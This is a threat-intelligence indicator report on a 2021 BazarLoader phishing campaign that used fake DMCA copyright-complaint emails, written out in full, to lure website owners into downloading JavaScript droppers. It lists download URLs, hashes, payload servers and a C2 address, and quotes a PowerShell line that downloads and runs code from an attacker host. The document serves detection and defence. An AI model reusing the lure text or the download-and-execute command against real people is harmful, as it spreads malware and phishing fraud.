2021-09-03 BazarLoader IOCs
THREAT IDENTIFICATION: BAZARLOADER

SUBJECTS OBSERVED
<domain redacted> - Contact us
Contact Submission

EMAIL ADDRESSES IN EMAIL BODY
Gerreropix192@hotmail.com
Holmesshot868@gmail.com

EMAIL BODY
First Email:
Name: Craig Gerrero
Title: Attention: http://www.<redacted>.com Digital Millennium Copyright Act (DMCA)
Copyright Violation Notification
Organization: Craig Gerrero photography
Organization Type: Provider
Email: Gerreropix192@hotmail.com
Phone: 19178876525
Comments: Hi there!My name is Craig.Your website or a website that your
organization hosts is violating the copyright-protected images owned by me
personally.Check out this report with the hyperlinks to my images you used
at http://www.<redacted>.com and my previous publications to find the evidence of my
copyrights.Download it now and check this out for
yourself:https://urldefense.com/v3/__https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-ewk39rgjj.html?alt=media&token=199118ba-056e-4115-b376-c3df54957323&l=779029658566515583__;!!LqLi6nfLPheP!dzw9VkIOsjA512V6R5CvwKmo-QOt3Jai-p6NiDwWmQGqSb8o2dUlS2sWr_7Y$
In my opinion you have deliberately violated my rights under 17 U.S.C.
Section 101 et seq. and could possibly be liable for statutory damage of up
to $140,000 as set-forth in Sec. 504 (c)(2) of the Digital millennium
copyright act (DMCA) therein.This message is official notice. I seek the
removal of the infringing materials mentioned above. Please take note as a
company, the Dmca requires you, to eliminate and/or disable access to the
copyrighted materials upon receipt of this notice. If you do not stop the
use of the aforementioned infringing materials a court action will be
initiated against you.I have a strong self-belief that utilization of the
copyrighted materials described above as allegedly infringing is not
approved by the copyright proprietor, its agent, or the legislation.I swear,
under consequence of perjury, that the information in this message is
correct and that I am currently the legal copyright owner or am certified to
act on behalf of the owner of an exclusive and legal right that is
presumably infringed.Sincerely,Craig Gerrero09/03/2021

Second Email:
name: Carolyn
email: Holmesshot868@gmail.com
message: Hi there! My name is Carolyn. Your website or a website that
your company hosts is violating the copyright-protected images owned
by myself. Take a look at this report with the URLs to my images you
used at www.<redacted>.com and my previous publication to get the proof of
my copyrights. Download it right now and check this out for yourself:
https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-dfj3bgvbfj49j.html?alt=media&token=4ad9f6f7-9853-46fe-9558-e7cccf2273be&data=504853615710049199
I believe you have willfully infringed my rights under 17 U.S.C.
Section 101 et seq. and could be liable for statutory damages of up to
$150,000 as set-forth in Sec. 504(c)(2) of the Digital millennium
copyright act (”DMCA”) therein. This message is official notice. I
demand the elimination of the infringing materials described above.
Take note as a company, the Digital Millennium Copyright Act requires
you, to remove or/and deactivate access to the copyrighted content
upon receipt of this letter. In case you don't stop the use of the
aforementioned copyrighted materials a court action can be initiated
against you. I have a strong self-belief that utilization of the
copyrighted materials described above as allegedly violating is not
authorized by the legal copyright proprietor, its agent, as well as
law. I declare, under consequence of perjury, that the information in
this notification is correct and that I am the copyright proprietor or
am certified to act on behalf of the proprietor of an exclusive right
that is allegedly violated. Sincerely, Carolyn Holmes 09/03/2021

MALDOC DOWNLOAD URLS
https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-ewk39rgjj.html?alt=media&token=199118ba-056e-4115-b376-c3df54957323&l=779029658566515583
https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-dfj3bgvbfj49j.html?alt=media&token=4ad9f6f7-9853-46fe-9558-e7cccf2273be&data=504853615710049199
https://zvanij.space/stat740893/
https://doc-0o-4s-docs.googleusercontent.com/docs/securesc/gnlhlnb8qdns2ascer457j15mvcqerbm/2fanaidumht957i2strkq8iq03gu2ulo/1630690125000/02739528562752194537/17154290304884295172Z/1L0PNjr_Gad2U_5Z9Xd-aXEV_aFsxe2A_?e=download&nonce=fq1ekude8hv5i&user=17154290304884295172Z&hash=4tpedt6ulud8cvvnh2ulu4qa7g37j149
https://doc-0g-7c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/l4hmg4n1sljpjprqf4llngajemo0ros1/1630690050000/02739528562752194537/*/1BeMQIso1ExLSlO-FwkG6ERbyXGIWt2YL?e=download

MALDOC FILE HASHES
Stolen Images Evidence.zip
4262f918371ed4d5ea549353150dd320
Stolen Images Evidence(1).zip
d264f165d1ee316a545136e78651e956
Which contains:
Stolen Images Evidence.js
ded36d93b97e7626cf478fce5f78c0de
Stolen Images Evidence.js
ec9fb3642db8bca6831057cbee2ecb99

POWERSHELL COMMANDS FROM THE JAVASCRIPT FILES
IEX (New-Object Net.Webclient).downloadstring("http://monosilk.space/034g100/index.php")

BAZARLOADER PAYLOAD DOWNLOAD URLS
http://104.21.37.205/034g100/index.php
http://104.21.37.205/034g100/main.php
http://172.67.212.231/034g100/index.php
http://172.67.212.231/034g100/main.php

BAZARLOADER PAYLOAD FILE HASHES
hWLFObl.dat
b6b5b4837718a095af7beebeaa7580bf
QLFvO.dat
0e38d7b585845609a126d454b5692040

BAZARLOADER C2
https://164.90.198.57/dir/child/issue